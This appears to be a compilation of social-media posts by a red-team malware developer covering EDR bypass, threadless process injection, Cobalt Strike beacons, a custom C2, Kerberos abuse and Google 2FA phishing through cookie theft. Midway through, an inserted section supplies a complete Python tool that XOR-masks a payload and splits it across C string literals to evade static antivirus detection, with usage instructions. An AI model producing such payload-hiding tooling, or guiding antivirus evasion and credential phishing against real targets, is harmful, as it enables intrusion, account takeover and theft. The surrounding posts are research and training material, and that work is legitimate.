As EDRs can overlook the standard APIs that create threads, you can use EnumThreadWindows to run your payload without explicitly calling ResumeThread!
Just load your PE, perform the relocation and IAT fixes, then call EnumThreadWindows on your PE start address to see the magic!
DLL injection seems to be the easy way to bypass EDRs. I was able to bypass some well-known EDRs with it.
It can be used to perform the first process injection, and then perform standard self-injection to deliver the beacon, to avoid unnecessary detection in the next stages.
Google 2FA-compliant phishing
Steal the user's credentials/cookies, then reinject them into your own Chrome session to steal the user's access.
On the right: the targeted user's view
On the left: the attacker's view
Automated using undetected-chromedriver.
(Sorry for the GIF quality)
The use of hardware breakpoints and argument patching directly in the registers seems to work like a charm.
SentinelOne hooks bypassed in a minute.
Thanks @rad9800 for the idea and your implementation example that works out of the box!
I published my #Defcon31 workshop on malware development!
If you want to dive into malware development or upgrade your game, feel free to browse the code snippets and try to bypass the MDE EDR!
I hope it will make you as happy as I am!
Didn't think it was possible, but it seems that developing #Rust #malware could be a way to limit detection (at least on #VirusTotal).
Basic shellcode XOR encryption and dynamic API resolution seem to be enough to get a 0 score on VirusTotal.
While digging into old research from @aionescu and Nirvana debugging, I found an undocumented way to achieve threadless process injection.
It bypasses several #EDRs out of the box, and the lack of kernel insight into it eases bypass with simple userland unhooking.
I've released the Python code I used to transform a binary into a C header file to hide your payload in .rdata. Nothing fancy, but it could save time😊
It just splits the binary into several strings to evade static analysis and then rebuilds it at compile time.
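For readers who want to see the idea in working form, here is an added example written for this page (it is not the author's released script, which is not reproduced here). It takes a payload, optionally XOR-masks it as in the VirusTotal post above, splits it into several C string literals and emits a header whose inline rebuild() copies the pieces back together at run time. The chunk size, the names (payload_N, payload_rebuild, PAYLOAD_LEN) and the choice of three-digit octal escapes are my own: a `\xNN` escape in C keeps consuming hex digits, so `"\x0aB"` is one escape and not two bytes, while `\012B` is always two. The sample payload in the test is constructed.

```python
"""Added example: emit a C header that stores a payload as several separate
string literals in .rdata and rebuilds it at run time (optionally XOR-masked)."""
from __future__ import annotations

import re

# Bytes kept verbatim inside a C literal: printable ASCII minus the two
# characters that need an escape and '?', which could start a trigraph.
_PRINTABLE = set(range(0x20, 0x7F)) - {ord('"'), ord("\\"), ord("?")}


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; applying it twice with the same key restores data."""
    if not key:
        return data
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def to_c_literal(chunk: bytes) -> str:
    """Encode bytes as a C string literal using three-digit octal escapes.
    Unlike \\xNN, an octal escape stops after three digits, so a byte followed
    by a hex-looking character (b'\\x0aB') can never be misparsed by the compiler."""
    body = "".join(chr(b) if b in _PRINTABLE else "\\%03o" % b for b in chunk)
    return '"' + body + '"'


def from_c_literal(lit: str) -> bytes:
    """Inverse of to_c_literal (only octal escapes are ever emitted)."""
    tokens = re.findall(r"\\[0-7]{3}|.", lit[1:-1], re.S)
    return bytes(int(t[1:], 8) if t.startswith("\\") else ord(t) for t in tokens)


def build_header(payload: bytes, chunk_size: int, name: str = "payload",
                 xor_key: bytes = b"") -> str:
    """Return C header text: one string literal per chunk plus an inline
    <name>_rebuild(dst) that memcpy()s the pieces together and unmasks them."""
    if chunk_size <= 0:
        raise ValueError("chunk_size must be positive")
    masked = xor_bytes(payload, xor_key)
    chunks = [masked[i:i + chunk_size] for i in range(0, len(masked), chunk_size)]
    up = name.upper()
    lines = [
        "#pragma once",
        "#include <stddef.h>",
        "#include <string.h>",
        f"#define {up}_LEN {len(payload)}",
        f"#define {up}_CHUNKS {len(chunks)}",
        f"#define {up}_KEY_LEN {len(xor_key)}",
    ]
    if xor_key:
        lines.append(f"static const unsigned char {name}_key[] = {to_c_literal(xor_key)};")
    for i, c in enumerate(chunks):
        # The C side uses sizeof(arr) - 1 rather than strlen(): chunks may hold NUL bytes.
        lines.append(f"static const char {name}_{i}[] = {to_c_literal(c)};")
    lines.append(f"static inline size_t {name}_rebuild(unsigned char *dst) {{")
    lines.append("    size_t off = 0;")
    for i in range(len(chunks)):
        lines.append(f"    memcpy(dst + off, {name}_{i}, sizeof({name}_{i}) - 1); "
                     f"off += sizeof({name}_{i}) - 1;")
    if xor_key:
        lines.append(f"    for (size_t k = 0; k < off; k++) dst[k] ^= {name}_key[k % {up}_KEY_LEN];")
    lines.append("    return off;")
    lines.append("}")
    return "\n".join(lines) + "\n"


def decode_header(header: str, name: str = "payload") -> bytes:
    """Do in Python what the generated rebuild() does in C, to check a header."""
    key_m = re.search(rf'{name}_key\[\] = ("[^\n]*");', header)
    key = from_c_literal(key_m.group(1)) if key_m else b""
    parts = re.findall(rf'{name}_(\d+)\[\] = ("[^\n]*");', header)
    parts.sort(key=lambda p: int(p[0]))
    masked = b"".join(from_c_literal(lit) for _, lit in parts)
    return xor_bytes(masked, key)


if __name__ == "__main__":
    import sys
    # usage: python gen_header.py payload.bin > payload.h  (key and chunk size hard-coded here)
    with open(sys.argv[1], "rb") as fh:
        blob = fh.read()
    sys.stdout.write(build_header(blob, chunk_size=64, xor_key=b"k3y"))
```

decode_header() exists so the generated header can be checked before it is compiled in; it is the same walk the C rebuild() performs. This is also where the later remark on the page about compiler optimization applies: with optimization enabled the compiler may lay the constant chunks out contiguously or even fold the memcpy() calls, so inspect the produced .rdata (for example with `strings` or a disassembler) rather than assuming the pieces stayed apart.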
Muscle up your game with Kerberos. Abuse tickets and Kerberos extensions to elevate your privileges.
I've built a small lab around S4U2Self abuse:
Find all you need here:
Thanks @pentest_swissky for the help on Ansible!
I published my Kerberos experiments. The code is here for educational use only. Do not use it for pentests, as it is neither OPSEC nor stable, and kind of messy.
But if you want to see how to play with #Kerberos on #Windows, it can be a starting point! 😊
Simple module stomper with an MSF reverse shell bypassing standard antivirus such as #Defender or #Kaspersky. Loading a legit DLL such as amsi.dll avoids the use of VirtualAlloc and gives a legit use for the allocated memory.
Got the idea from . Thanks @__mez0__
I wrote an article on how to bypass VPN compliance checks. It's based on the Palo Alto VPN, but the approach can be applied to other VPNs.
Process exploration, reverse engineering, step-by-step explanation!
Thanks to @iansus and @th3m4ks for the review!
Finally! After one week spent in WinHTTP.dll, I finally succeeded in making it work with my custom DLL loader without hijacking the #IAT.
The idea is to locate the #LdrpInvertedFunctionTable and add the DLL's ExportDirectory to it once the DLL has been loaded and linked to the #PEB.
Finished my LoadLibrary implementation! Still not linked to the PEB, as Windows structures are a pain in the *, but it works!
Was nice to dive into the PE structure!
Credit:
- @Ahm3d_H3sham
- @batsec
- @__mez0__
I can go to sleep now.
The DLL loader loads an arbitrary DLL without raising the usual event. The delayed DLLs are loaded just in time, to avoid loading several DLLs for nothing.
The DLL ensures the integrity of the Windows structures and is thus compatible with the Win32 API.
If you missed my talk at @_leHACK_, you can find the slides here.
The presentation shows some unusual techniques to perform process injection without the standard Win32 API.
Took me 8 hours, but that was fun!
A nice way to begin the year 🥳
This is a nice training with a nice lab for anyone wanting to enhance their skillset.
If your grandparents gave you some money for Xmas, invest it in yourself and take the #CRTO training by @zeropointsecltd! 🤗
Swapping command-line arguments at runtime on a Windows signed binary through DLL proxying.
Could be nice to avoid detection based on the command line.
Thanks @iansus for the idea!
Just adapted @_EthicalChaos_'s #ThreadLess injection to work with a #Cobalt beacon in pure C.
It works really nicely! I mixed it with module stomping to avoid beacon execution from unbacked memory, large VirtualAlloc allocations and the use of the CRT to execute the beacon itself.
All the DLL loaders I have seen so far resolve all the delayed imports when performing the snapping.
You can avoid loading all the DLLs by hijacking #ResolveDelayLoadedAPI during the snapping, to resolve the imports when they are requested by the DLL.
It avoids loading several DLLs.
Finally 🤩 I got PIC code for my #beacon! It was a really nice journey and a lot of things have been learnt on the way.
If you want to try it too, I found this blog by @winternl_t really interesting
And as usual, @C5pider's #Havoc ❤️
An interesting post about the kernel callbacks used by EDRs. It's a nice article to read if you want to dive into EDR kernel callback bypasses.
Thanks @synzack21 for the blog post! :)
The part about @fdiskyou's evil.sys driver and experiments is really nice! :)
If you want to automate Google login for, ... I don't know ..., a phishing campaign for example, give a try to this custom chromedriver. It bypasses the restrictions set by Google on login through automation scripts.
Hey! I've totally forgotten to publish my CoffLoader code.
Remember it is not production-ready code, but an example for my article, so the code is kind of a mess...
Thanks to @TrustedSec and @C5pider for paving the way with their code & articles!
Here are some videos of my custom C2 🫣
The first one shows JIT beacon compilation and basic commands.
The second one shows the linked beacon capabilities with a TCP beacon.
There are a lot of improvements needed, but it's a good start 😊
Took way more time than I thought, but now it works! I can ask for a TGT and inject it without #Rubeus. Not sure if it's useful, but it was really interesting!
Next thing is to look into the #TGTDeleg trick and adapt it as a #BOF (even if I know a working one already exists).
Three freaking days to find the bug.
It seems to be pModBaseAddrIndex->Root instead of pModBaseAddrIndex in the DarkLoadLibrary project.
It raises random bugs with some DLLs otherwise, and it's hell to debug. The NTDLL assembly gives the answer, as always.
And here is the video for the linked compilation part. In this example, it chains a shellcode loader with a wrapper to transform a #Cobaltstrike beacon from raw shellcode into an "#OPSEC" binary.
Here are some videos for the compilation pipeline😊
There are three parts:
- Training to know what you use
- Simple compilation
- Linked compilation to chain different loaders
This is early dev, so additional features will be added. If you have some ideas, feel free to share!
If you try to hide your payloads in .rdata by splitting them into several strings and reassembling them during execution, it can be interesting to disable compiler code optimization... Will save you some time...
#ElasticEDR Premium has quite aggressive static detection
Another step reached!
Got full support of #CobaltStrike #BOF in my custom #C2 beacon. Some upgrades can be done, but that's a start.
Here is a simple test with the @TrustedSec BOF collection
It's 2023, CrackMapExec can now dump DPAPI credentials as a core feature!🚀
This is possible thanks to the work of @_zblurx and his library dploot! He also added a module to dump Firefox passwords 🔥
Pushed on @porchetta_ind v5.4.5 Bruce Wayne 🪂
No excuse, DA every time 🔽
This feeling when you dir \\DC\C$ will never fade.
I've rooted several forests, but it always hits the same as the first time, because this is not about controlling the whole forest, it's about the journey: from the first phishing mail you sent to the total compromise of the forest.
And the last one implemented in the pipeline!
If you want to run Rubeus directly on the DC to wake up the SOC before the holidays.
It supports:
- Custom GetProcAddress / LoadLibrary / GetModuleHandle
- String obfuscation
- ETW/AMSI patching
- HWBP for unhooking
- And more!
Continuing the #NtSetInformationProcess exploitation series, @th3m4ks wrote an article on universal #EDR blinding through exploitation of NtSetInformationProcess, and it's worth it
#Reversing the #NTDLL is really interesting, I see several data structures and algorithms I only used in school.
I rediscovered fast sorting algorithms, red-black binary trees, binary search and even what I think was #Dijkstra's algorithm.
Just committed my changes on #Impacket Secretsdump 🤞
If merged, you will be able to dump TDO secrets from a local NTDS without needing an additional DCSync.
You can find the PR changes here:
Now that all my malware has been ported to CMake, it's time to create a nice compilation pipeline.
The goal is to be able to add different layers easily through the GUI, without needing to install the whole toolchain and without giving direct access to the source code...
Linked #MSSQL servers are an interesting feature, but if you misconfigure them and add a self-referencing link with #SA privileges on the database, you've just paved the way for sneaky privesc through OPENQUERY, OPENROWSET and EXECUTE AT.
If you missed my talk at #LeHack 2023 on uncommon patterns for process injection, you can still see it on YouTube (French only 😅)
Thanks @_leHACK_ for the event and the opportunity!
If you failed to use WinHTTP.dll with a custom LoadLibrary (error 126), it can be due to the TakeSingleDllRef function.
This function performs a GetModuleHandleExA on itself to get its module HANDLE.
In this case, you have to hijack this function in the DLL's IAT when it is loaded.
Using an EDR for malware development really helps to understand how each technique impacts detection. Here is the difference in alerts raised with module stomping, @rad9800's HWBP and @_EthicalChaos_'s threadless injection.
1 - HWBP only
2 - 1 + Threadless
3 - 1 + 2 + Module Stomping
What a journey! The #Cybernetics lab by @hackthebox_eu is really interesting and worth its price!
Kept me busy for a month. If you want to try an advanced HTB lab, upgrade your AD skills or just try some C2 capabilities, just take this lab. You won't regret it.
If you want to develop malware things, develop malware things, don't be stupid like me and start developing a fully broken ecosystem by yourself...
I'm already starting to forget why I started this project 🫠
And yes, I know about #Mythic, but I don't like WebUI C2s...
I ported my #cobaltstrike loaders as #BOFs to avoid using the built-in inject command.
That was fun and not so hard with the @TrustedSec article and the CS-Situational-Awareness-BOF repo as examples.
I think I finally managed to build a real company network at home.
I have a DMZ, several VLANs, a reverse proxy, an IPsec VPN, and nothing works at the same time, I don't know why, and I have no idea what is exposed on the Internet...
First step for position independent code (#PIC):
✔️get rid of the .data section
(if someone remembers the new C keyword that allows defining a string directly on the stack without using the { } notation)
Hey! @Defcon workshops have been released!
You can find mine here!
Feel free to ask additional questions and apply!
I'm so glad to see you in Vegas 🤗
Developing P2P #beacon capabilities is like doing networking with layer 7 only... In two weeks you will see a new BGP release working on layer 7 only 😂
Now that basic features are working, let's make it #PIC and add some #malware stuff in it 🤓
Something nice to know: once WinHTTP.dll is loaded, the WinHttpOpen function reloads WinHTTP.dll to find some specific functions...
Bro, if you are executing this code it's because you are already loaded, why are you doing this? You fuck up the benefits of my custom LoadLibrary...
If you are doing some development in C/C++, you really should use Microsoft Application Verifier!
It is really nice for debugging memory allocation, double frees, wrong API usage and a lot more!
Reading the code and redeveloping parts of the tools you use on a regular basis is, I think, the best way to deeply understand the underlying concepts.
Currently redeveloping some parts of #Rubeus, and I'm learning so much about #Kerberos implementation/exploitation on Windows!
My #CoffLoader is fully functional! It supports uninitialized variables through a dynamic .bss and several relocation types.
Thanks to @C5pider for giving me the idea through his #CoffeeLdr and to @TrustedSec for showing me the way!
I will try to make it public as soon as I can 🥹
If you want to learn how to unhook #EDR hooks with style and understand how kernel callbacks can be bypassed through a vulnerable driver, look at the #EDRSandblast code!
I've learnt so much from this project! Thanks @th3m4ks and @_Qazeer for your work!
Bonus: static lib ❤️
A promise is a promise: the slides from the #DEFCON30 DemoLabs @_Qazeer and I presented about EDRSandblast are uploaded on GitHub, along with the latest version of the tool! Check out the list of new features in the slides, documentation is on its way ;)
My first @defcon has ended.
It was a great experience, even if my workshop didn't fully work as planned due to a Wi-Fi failure limiting access to the cloud EDR and the tools download.
Now, it's a 2-week infosec break for a USA road trip! First step, Vegas to Grand Canyon.
What is it like to be a red teamer? 🫣
Spending 3 days turning a compromised legit app into a full C2 to pivot among all users and avoid a painful phishing campaign 🫠
I'm sure they didn't even know their application could be used like this 😂
Me fucking around with the Ldr red-black trees until my DLL agrees to appear as loaded and stops crashing during entrypoint processing...
(yes, treeS, they have two freaking trees to keep track of a loaded DLL)
I don't know if it will work well in the end, if it will be #OPSEC or if I will be able to use it in a real-world operation, but all the things I'm learning along the way are worth it 🫠
I will finally be able to work on some #malware things now ❤️
How, I saw you have finally found an exploitation path, so everything is finished now? Can you extract the NTDS? Shouldn't take too long
Me and my 3 chained SOCKS
Thanks and credit to @OtterHacker at this point, as your DefCon workshop slides/code gave me the inspiration to combine module stomping with ThreadlessInject to avoid any injection alerts.
@nu11charb Trend Micro is still using hooking on NtWriteVirtualMemory. Your loader must be adapted to the EDR. Saying this technique is an OPSEC mistake depends on the EDR…
Just submitted my first machine to @hackthebox_eu! Hope it will be accepted 🤞
The machine is based on vulnerabilities found during pentests!
Thanks for this amazing playground!
Once again, my experience today shows that #NAC is not a security measure against attacks but against simple users.
Took 2 network adapters and a few commands to bypass it...
Other surprise: I saw a printer supporting 802.1X.
Write-up can be found here:
Yay! I just have to pack this in a nice #Impacket function and add the option to #Secretsdump!
The WinXP source code helped me to successfully map NTDS columns to their content! Never thought I would one day have to look at this code 😊
Xmas commit!
Will do some additional testing and refactoring before releasing it, but here is a modular project making Google account #phishing easier through cookie stealing.
The lessons-learned write-up (REX) about its possible use in #RedTeam operations is in progress!
Will make a POC video today
Cyber break is finished, time to go back to breaking things I know nothing about
Before that, here is a post on my first @defcon experience as a workshop instructor
If you want to create a workshop for #Defcon32, you will find the rookie mistakes I made.
It is gonna be long to describe the AS-REQ ASN.1 with my custom structures 😅
The more I dive into Windows internal crypto to compute hashes and Kerberos elements, the more respect I have for @gentilkiwi.
Spent hours with a debugger trying to understand how the CRYPTDLL interface works